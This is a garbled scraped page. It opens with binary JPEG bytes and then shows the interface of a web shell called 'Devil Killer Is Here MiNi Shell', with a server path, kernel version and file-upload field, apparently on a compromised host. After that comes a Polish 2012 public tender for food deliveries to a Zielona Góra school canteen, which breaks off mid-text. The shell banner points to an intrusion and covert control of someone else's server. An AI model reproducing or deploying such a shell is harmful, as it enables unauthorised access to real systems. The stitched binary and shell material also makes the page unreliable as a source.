JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120117/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120117/16027-N-2012.html

<p class="kh_header"><b>Zielona Góra: dostawa żywności do stołówki Zespołu Szkół Ogólnokształcących  i Sportowych w Zielonej Górze z podziałem na zadania- liczba zadań 6</b><br>
<b>Numer ogłoszenia: 16027 - 2012; data zamieszczenia: 17.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół Ogólnokształcących i Sportowych w Zielonej Górze , ul. St. Wyspiańskiego 21, 65-036 Zielona Góra, woj. lubuskie, tel. 68 4512050, faks 68 4512051.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zsois.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Szkoła.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawa żywności do stołówki Zespołu Szkół Ogólnokształcących  i Sportowych w Zielonej Górze z podziałem na zadania- liczba zadań 6.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.  Przedmiotem zamówienia jest dostawa żywności do stołówki Zespołu Szkół 
    Ogólnokształcących  i Sportowych w Zielonej Górze z podziałem na  zadania- liczba zadań 6 
       1.1.Zadanie nr 1-  dostawa produktów mleczarskich
             Szczegółowy opis przedmiotu zamówienia  dla zadania nr 1 zawarty jest w załączniku Nr 7.1. do SIWZ
      Oznaczenie  przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 
       15.50.00.00-3- Produkty mleczarskie,
       1.2.Zadanie  nr 2 -  dostawa mięsa , produktów mięsnych i wędlin
             Szczegółowy opis przedmiotu zamówienia  dla zadania nr 2 zawarty jest w załączniku Nr 7.2. 
do SIWZ
       Oznaczenie  przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 
        15.10.00.00-9- Produkty zwierzęce, mięso i produkty mięsne,
        15.13.11.30-5- Wędliny,
       1.3. Zadanie  nr 3 - dostawa różnych produktów spożywczych
              Szczegółowy opis przedmiotu zamówienia  dla zadania nr 3 zawarty jest w załączniku Nr 7.3. do SIWZ
      Oznaczenie  przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 
              15.80.00.00-6- Różne produkty spożywcze,
1.4.Zadanie nr 4 - dostawa owoców, warzyw oraz jaj
             Szczegółowy opis przedmiotu zamówienia  dla zadania nr 4 zawarty jest w załączniku Nr 7.4. 
             do SIWZ
         Oznaczenie  przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 
         15.30.00.00-1- Owoce, warzywa i podobne produkty,
         01.24.20.00-5 - jaja
1.5.Zadanie nr 5-  dostawa pieczywa 
             Szczegółowy opis przedmiotu zamówienia  dla zadania nr 5 zawarty jest w załączniku Nr 7.5. do SIWZ
      Oznaczenie  przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 
         15.81.10.00-6- Pieczywo,
       1.6.Zadanie nr 6-   dostawa mrożonek warzywno-owocowych 
             Szczegółowy opis przedmiotu zamówienia  dla zadania nr 6 zawarty jest w załączniku Nr 7.6. do SIWZ
     Oznaczenie  przedmiotu zamówienia według Wspólnego Słownika Zamówień (CPV): 
     15.33.11.70-9- Warzywa mrożone	                 
        2. Dostawy powinny odpowiadać normom sanitarnym i higienicznym przewidzianym dla żywności na   
   terenie RP.
3.  Przedmiot zamówienia będzie pochodził z bieżącej produkcji, tej samej partii produkcyjnej, będzie 
        wytwarzany zgodnie z zasadami GMP (Dobrej Praktyki Produkcyjnej) i dostarczany zgodnie z 
        obowiązującymi przepisami:
a.	ustawy z dnia 25 sierpnia 2006 o bezpieczeństwie Żywności i Żywienia (Dz.U. Nr 171, poz.1225) i innymi aktami wykonawczymi do tej ustawy,
b.	rozporządzenia (WE) 178 -2002 Parlamentu Europejskiego i Rady z dnia 28 stycznia 2002 ustanawiającego ogólne zasady i wymagania prawa Żywnościowego, powołującego Europejski Urząd ds. Bezpieczeństwa Żywności oraz ustanawiającego procedury w zakresie bezpieczeństwa Żywności (Dz. U. UE L Nr 31, poz. 1),
c.	rozporządzenia (WE) 1935-2004 Parlamentu Europejskiego i Rady z dnia 27 października 2004. w sprawie materiałów i wyrobów przeznaczonych do kontaktu z Żywnością oraz uchylającego Dyrektywy 80-590-EWG i 89-109-EWG  (Dz. U. UE L Nr 338, poz. 4),
d.	ustawy z dnia 16 grudnia 2005 o produktach pochodzenia zwierzęcego (Dz.U. z 2006 r. Nr 17, poz. 127 z późn zm.),
e.	rozporządzenia (WE) 853-2004, Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 ustanawiającego szczególne przepisy dotyczące higieny w odniesieniu do Żywności pochodzenia zwierzęcego (Dz. Urz. UE L Nr 139, poz. 55 z późn zm.),
f.	rozporządzenia (WE) 854-2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 ustanawiającego szczególne przepisy dotyczące organizacji urzędowych kontroli w odniesieniu do produktów pochodzenia zwierzęcego przeznaczonych do spożycia przez ludzi (Dz. Urz. UE L Nr 139, poz. 206 z późn zm.),
g.	rozporządzenia Ministra Rolnictwa i Rozwoju Wsi z dnia 10 lipca 2007 w sprawie znakowania środków spożywczych (Dz. U. Nr 137, poz. 966 z późn zm.),
h.	rozporządzenia (WE) 852/2004 Parlamentu Europejskiego i Rady z dnia 29 kwietnia 2004 w sprawie higieny środków spożywczych (Dz. U. UE L Nr 139, poz. 1 z późn zm.), 
i.	ustawy z dnia 21 grudnia 2000 r. o jakości handlowej artykułów rolno spożywczych (Dz. U. z 2005 Nr 187, poz. 1577 z późn zm.).
4. Płatność za wykonanie przedmiotu umowy nastąpi przelewem po każdej dostawie na
      podstawie faktur częściowych w terminie 14 dni, od daty jej złożenia.
5.   Szczegółowy opis przedmiotu zamówienia zawiera załącznik nr  7 (od 7.1 do 7.6 )  do SIWZ.
       W przypadku podania w tabeli  -wykaz asortymentu - załącznik nr 7.1 - 7.6, nazw własnych lub
       typów to  zgodnie z art. 29 ust.3 ustawy pzp, Zamawiający dopuszcza złożenie ofert
       równoważnych.Za równoważne Zamawiający uzna produkty, które posiadać będą te same
       składniki, konsystencję, gramaturę oraz  wartości odżywcze i walory smakowe co produkty
      podane   przykładowo. W takim przypadku należy  wpisać jaki produkt oferuje Wykonawca .
6.   Informacje ogólne dla zadania 1-6:
6.1 Zadanie będzie realizowane sukcesywnie wg. zapotrzebowania Zamawiającego. 
6.2.Zamawiający przekaże faksem lub telefonicznie i potwierdzone pisemnie  Wykonawcy  wykaz
      produktów wraz z terminem i godzinami dostawy.
6.3.Dostawy winny być realizowane przy użyciu środków transportowych przeznaczonych do
      przewozu  żywności zgodnie z obowiązującymi przepisami.
6.4.Odbioru towaru w siedzibie Odbiorcy zgodnie z jego upoważnieniem dokona wyznaczony przez
Zamawiającego pracownik.
6.5.Koszty przewozu, zabezpieczenia towaru i ubezpieczenia za czas przewozu ponosi Wykonawca,  a  Zamawiający zapewni odbiór towaru w siedzibie Zamawiającego.
6.6.Za dostarczoną żywność (w tym ubezpieczenie, stan jakościowy) odpowiada Wykonawca do
      czasu  odbioru zrealizowanego zamówienia przez Zamawiającego. 
6.7.Dostarczany towar winien być świeży z okresami ważności odpowiednimi dla danego asortymentu,
     wysokiej jakości t.j. I-go gatunku bez wad fizycznych i jakościowych i odpowiadać Polskim
     Normom. Wyroby winny być oznaczone zgodnie z obowiązującymi przepisami. W przypadku
     dostarczenia towaru niezgodnego z zamówieniem lub niewłaściwej jakości bądź niedostarczenia
     zamówionego towaru a także niedokonania niezwłocznej jego wymiany na towar właściwy, 
         Zamawiający ma prawo dokonania zakupu zamówionego towaru w dowolnej jednostce
          handlowej. Koszty powstałe z tego tytułu obciążają Wykonawcę.
6.8.  Wykonawca winien posiadać atest laboratoryjny.
6.9. Przy posiadaniu towaru w innych opakowaniach Wykonawca winien przeliczyć wartość
         opakowania do gramatury podanej przez Zamawiającego.
6.10.W przypadku niezgodności dostarczanych artykułów z wymogami i opisem zawartym w SIWZ, 
        Zamawiający odmówi odbioru tych artykułów a Wykonawca poniesie koszty zgodnie z zapisem
        pkt.   3.7.5. 
6.11.Zamawiający zastrzega sobie możliwość wprowadzania zmian do umowy w zakresie
          zmniejszania   ilości dostaw w sytuacjach, których Zamawiający nie mógł przewidzieć w chwili
         jej zawarcia. Zamawiający nie będzie ponosił ujemnych skutków finansowych spowodowanych
         zmniejszeniem ilości  dostaw przewidzianych w umowie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3, 15.10.00.00-9, 15.13.11.30-5, 15.80.00.00-6, 15.30.00.00-1, 01.24.20.00-5, 15.81.10.00-6, 15.33.11.70-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku posiadania niezbędnego doświadczenia Zamawiający uzna wykazanie, że w 
okresie  ostatnich trzech lat przed upływem terminu  składania ofert do udziału w postępowaniu , a 
jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, wykonał lub wykonuje: 
1)      zadanie  nr 1
          minimum jedno  zadanie w zakresie dostawy  produktów mleczarskich, o minimalnej wartości 90.000 zł brutto ,udokumentowane,  że zostało wykonane  lub jest wykonywane należycie.
          Sprawdzenie  ww. warunku udziału w postępowaniu  odbywać się będzie na podstawie przedłożonych dokumentów i oświadczeń wg zasady spełnia / nie spełnia,
2)      zadanie nr 2
          minimum jedno zadanie  w zakresie dostawy   mięsa lub produktów mięsnych  lub wyrobów wędliniarskich o minimalnej wartości 120.000 zł brutto,  udokumentowane,  że zostało wykonane  lub jest wykonywane należycie.
          Sprawdzenie  ww. warunku udziału w postępowaniu  odbywać się będzie na podstawie przedłożonych dokumentów i oświadczeń wg zasady spełnia / nie spełnia,



3)      zadanie nr 3 
          minimum jedno zadanie w zakresie  asortymentu  produktów spożywczych  o minimalnej wartości 100.000 zł brutto,  udokumentowane,  że zostało wykonane  lub jest wykonywane należycie.
          Sprawdzenie  ww. warunku udziału w postępowaniu  odbywać się będzie na podstawie przedłożonych dokumentów i oświadczeń wg zasady spełnia / nie spełnia,
4)      zadanie nr 4
          minimum jedno zadanie w zakresie  asortymentu  produktów owocowo-warzywnych  o minimalnej wartości 50.000,00 zł brutto,  udokumentowane,  że zostało wykonane  lub jest  wykonywane należycie.
          Sprawdzenie  ww. warunku udziału w postępowaniu  odbywać się będzie na podstawie przedłożonych dokumentów i oświadczeń wg zasady spełnia / nie spełnia,
5)      zadanie nr 5
          minimum jedno zadanie w zakresie  pieczywa  o minimalnej wartości 20.000,00 zł brutto,  udokumentowane,  że zostało wykonane  lub jest wykonywane należycie.
          Sprawdzenie  ww. warunku udziału w postępowaniu  odbywać się będzie na podstawie przedłożonych dokumentów i oświadczeń wg zasady spełnia / nie spełnia,
6)      zadanie nr 6 
          minimum jedno zadanie w zakresie  mrożonek warzyw lub owoców  o minimalnej wartości 15.000,00 zł brutto,  udokumentowane,  że zostało wykonane  lub jest wykonywane należycie.
          Sprawdzenie  ww. warunku udziału w postępowaniu  odbywać się będzie na podstawie przedłożonych dokumentów i oświadczeń wg zasady spełnia / nie spełnia,</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>-   wypełniony formularz oferty wg załącznika Nr 1 do SIWZ;
-  oświadczenie, że Wykonawca wykona zamówienie własnymi siłami lub określi część zamówienia,
    której  wykonanie powierzy Podwykonawcom wg załącznika Nr 5 do SIWZ; 
-  wypełnione i podpisane oświadczenie o spełnianiu warunków art. 22 ust. 1 pkt 1 - 4 ustawy pzp w
    załącznika Nr 6 do SIWZ;
-   pisemne zobowiązanie, o którym mowa w pkt  5.2. SIWZ, o ile Wykonawca polega na zasobach
     innych  podmiotów na zasadach określonych w art. 26 ust. 2b ustawy pzp;
-   dokładnie wypełniona tabela- wykaz asortymentu  ( w polskich złotych , z dokładnością do dwóch
     miejsc po przecinku) wg załącznika Nr 7 (od 7.1 do 7.6 ) do SIWZ w   zależności od ilości zadań 
     ( dotyczy    każdego zadania  oddzielnie );   
-    zaakceptowany projekty umowy wg załącznika Nr 8  do SIWZ ;
- pełnomocnictwo lub inny dokument określający zakres umocowania do reprezentowania
     Wykonawcy, o   ile ofertę składa pełnomocnik Wykonawcy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany dopuszczalne w zakresie przewidzianym w SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.lo7.bipzielonagora.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie
     Zamawiającego w sekretariacie, ul. St. Wyspiańskiego 21, 65-036 Zielona Góra -internat parter..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2012 godzina 10:00, miejsce: siedziba Zamawiającego, sekretariat parter, 
ul. St. Wyspiańskiego 21, 65-036 Zielona Góra..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> dostawa produktów mleczarskich.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa produktów mleczarskich do stołówki Zespołu Szkół Ogólnokształcących  i Sportowych w Zielonej Górze. Szczegółowy opis przedmiotu zamówienia  dla zadania nr1  zawarty jest w załączniku Nr 7.1. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.50.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> dostawa mięsa , produktów mięsnych i wędlin.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mięsa , produktów mięsnych i wędlin do stołówki Zespołu Szkół Ogólnokształcących  i Sportowych w Zielonej Górze. Szczegółowy opis przedmiotu zamówienia  dla zadania nr 2 zawarty jest w załączniku Nr 7.2. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9, 15.13.11.30-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> dostawa różnych produktów spożywczych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa różnych produktów spożywczych do stołówki Zespołu Szkół Ogólnokształcących  i Sportowych w Zielonej Górze. Szczegółowy opis przedmiotu zamówienia  dla zadania nr 3 zawarty jest w załączniku Nr 7.3. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> dostawa owoców, warzyw oraz jaj.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa owoców, warzyw oraz jaj do stołówki Zespołu Szkół Ogólnokształcących  i   Sportowych w Zielonej Górze. Szczegółowy opis przedmiotu zamówienia  dla zadania nr 4 zawarty jest w załączniku Nr 7.4. do SIWZ ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.30.00.00-1, 01.24.20.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa pieczywa do stołówki Zespołu Szkół Ogólnokształcących  i Sportowych w Zielonej Górze. Szczegółowy opis przedmiotu zamówienia  dla zadania nr 5 zawarty jest w załączniku Nr 7.5. do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.10.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> dostawa mrożonek warzywno-owocowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Dostawa mrożonek warzywno-owocowych do stołówki szkolnej w Zespole Szkół  Ogólnokształcących
